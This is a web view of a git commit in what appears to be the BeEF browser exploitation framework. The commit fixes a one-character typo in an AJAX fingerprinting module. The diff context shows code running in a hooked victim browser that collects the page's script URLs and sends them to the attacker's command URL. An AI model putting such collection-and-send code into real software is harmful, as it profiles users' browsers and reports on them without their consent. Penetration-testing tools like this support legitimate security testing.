Skip to content

Commit edda018

Browse files
committed
Removed typo (trailing a) missed in last commit
1 parent 4fc300f commit edda018

File tree

1 file changed

+1
-1
lines changed
  • modules/browser/hooked_domain/ajax_fingerprint

1 file changed

+1
-1
lines changed

modules/browser/hooked_domain/ajax_fingerprint/command.js

+1-1
Original file line numberDiff line numberDiff line change
@@ -69,7 +69,7 @@ beef.execute(function() {
6969
}
7070
}
7171
if(results.length >0){
72-
urls=unique(results).join('||');a
72+
urls=unique(results).join('||');
7373
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
7474
}
7575
else{

0 commit comments

Comments
 (0)